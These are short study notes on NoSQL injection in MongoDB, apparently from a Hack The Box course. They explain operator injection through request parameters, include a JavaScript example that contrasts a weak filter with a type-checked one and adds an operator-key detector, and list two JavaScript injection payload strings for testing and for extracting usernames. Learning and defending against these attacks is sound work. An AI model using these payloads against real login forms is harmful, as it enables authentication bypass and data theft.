
NoSQL Injection

Intro

NoSQL databases were built in opposition to relational databases. They are based on different paradigms: document-oriented, key-value, wide-column store, and graph databases.

HTB focuses on MongoDB, which is document-oriented: its documents kinda look like Python dictionaries, and its operators look like the PowerShell ones.

A NoSQL query looks like this:

.find({
    user : "username",
    password : "password"
})

An operator can be injected in the request body or in the URI, using the form:

param[$op]=val
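
Added example, not part of the original notes: what the param[$op]=val form becomes once a bracket-aware parser has decoded it, with a weak filter builder next to a type-checked one and a helper that flags operator keys for logging. The function names and sample bodies are assumptions made for illustration, and $ne stands in for $op.

```javascript
// A bracket-aware parser turns password[$ne]= into { password: { $ne: "" } }.
// Both bodies below are constructed samples of such parser output.
const benignBody = { user: "alice", password: "s3cret" };
const operatorBody = { user: "alice", password: { $ne: "" } };

// Weak: parser output goes straight into the filter, so an object value
// is interpreted by MongoDB as a query operator instead of a literal.
function buildFilterWeak(body) {
  return { user: body.user, password: body.password };
}

// Detection helper: list the path of every key that starts with "$".
function findOperatorKeys(value, path = "") {
  if (value === null || typeof value !== "object") return [];
  const hits = [];
  for (const [key, child] of Object.entries(value)) {
    const here = path ? `${path}.${key}` : key;
    if (key.startsWith("$")) hits.push(here);
    hits.push(...findOperatorKeys(child, here));
  }
  return hits;
}

// Hardened: every field used in the filter must be a primitive string,
// so an operator object is rejected before any query is built.
function buildFilterStrict(body) {
  for (const field of ["user", "password"]) {
    if (typeof body[field] !== "string") {
      throw new TypeError(`${field} must be a string`);
    }
  }
  return { user: body.user, password: body.password };
}
```

The string check only stops operator objects. The JS payloads under Examples are plain strings, so they pass a type check and need separate handling wherever input reaches server-side JavaScript.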

Examples

Test for JS payloads

" || true || ""=="

JS Extraction

" || (this.username.match('^.*')) || ""=="

Resources